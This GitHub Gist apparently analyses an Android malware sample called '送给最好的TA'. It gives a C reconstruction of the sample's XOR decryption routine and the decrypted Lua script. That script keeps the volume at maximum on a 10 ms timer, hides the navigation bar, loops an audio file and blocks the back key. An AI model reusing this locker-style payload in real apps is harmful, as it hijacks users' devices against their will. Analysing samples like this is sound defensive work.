-
The decryption code lies in
lib/armeabi-v7a/libluajava.so, luaL_loadbufferx(). -
You can use
unluacto convert lua bytecode to source code.
Last active
September 27, 2019 11:24
-
-
Save taoky/9d5bc41e0a377f36bf02469e62880991 to your computer and use it in GitHub Desktop.
Malware "送给最好的TA" Analysis
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| char * load(char *a2, size_t size) | |
| { | |
| char *v9; // r0 | |
| int v10; // r1 | |
| signed int v11; // r2 | |
| char *v13; // [sp+8h] [bp-28h] | |
| size_t v14; // [sp+Ch] [bp-24h] | |
| v13 = (char *)a2; | |
| v14 = size; | |
| if ( a2[0] == 0x1B && a2[1] != 0x4C ) | |
| { | |
| v9 = malloc(size); | |
| if ( size ) | |
| { | |
| *v9 = 27; | |
| if ( size != 1 ) | |
| { | |
| v10 = 0; | |
| v11 = 1; | |
| do | |
| { | |
| v10 += size; | |
| v9[v11] = a2[v11] ^ (v10 | |
| + ((unsigned int)(((unsigned long long)(-2139062143LL * v10) >> 32) + v10) >> 7) | |
| + ((signed int)(((unsigned long long)(-2139062143LL * v10) >> 32) + v10) < 0)); | |
| ++v11; | |
| } | |
| while ( size != v11 ); | |
| } | |
| } | |
| v13 = v9; | |
| } | |
| return v13; | |
| } | |
| int main() { | |
| FILE* fin = fopen("main.lua", "rb"); | |
| char *raw = malloc(1642); | |
| char *out; | |
| fread(raw, 1642, 1, fin); | |
| printf("file read\n"); | |
| out = load(raw, 1642); | |
| FILE *fout = fopen("output.lua", "wb"); | |
| fwrite(out, 1642, 1, fout); | |
| return 0; | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require("import") | |
| import("android.app.*") | |
| import("android.os.*") | |
| import("android.widget.*") | |
| import("android.view.*") | |
| import("android.view.View") | |
| import("android.content.Context") | |
| import("android.media.MediaPlayer") | |
| import("android.media.AudioManager") | |
| import("com.androlua.Ticker") | |
| activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI) | |
| activity.getDecorView().setSystemUiVisibility(View.SYSTEM_UI_FLAG_HIDE_NAVIGATION | View.SYSTEM_UI_FLAG_IMMERSIVE) | |
| m = MediaPlayer() | |
| m.reset() | |
| m.setDataSource(activity.getLuaDir() .. "/0.mp3") | |
| m.prepare() | |
| m.start() | |
| m.setLooping(true) | |
| ti = Ticker() | |
| ti.Period = 10 | |
| function ti.onTick() | |
| activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI) | |
| activity.getDecorView().setSystemUiVisibility(View.SYSTEM_UI_FLAG_HIDE_NAVIGATION | View.SYSTEM_UI_FLAG_IMMERSIVE) | |
| end | |
| ti.start() | |
| function onKeyDown(A0_0, A1_1) | |
| if string.find(tostring(A1_1), "KEYCODE_BACK") ~= nil then | |
| activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI) | |
| end | |
| return true | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment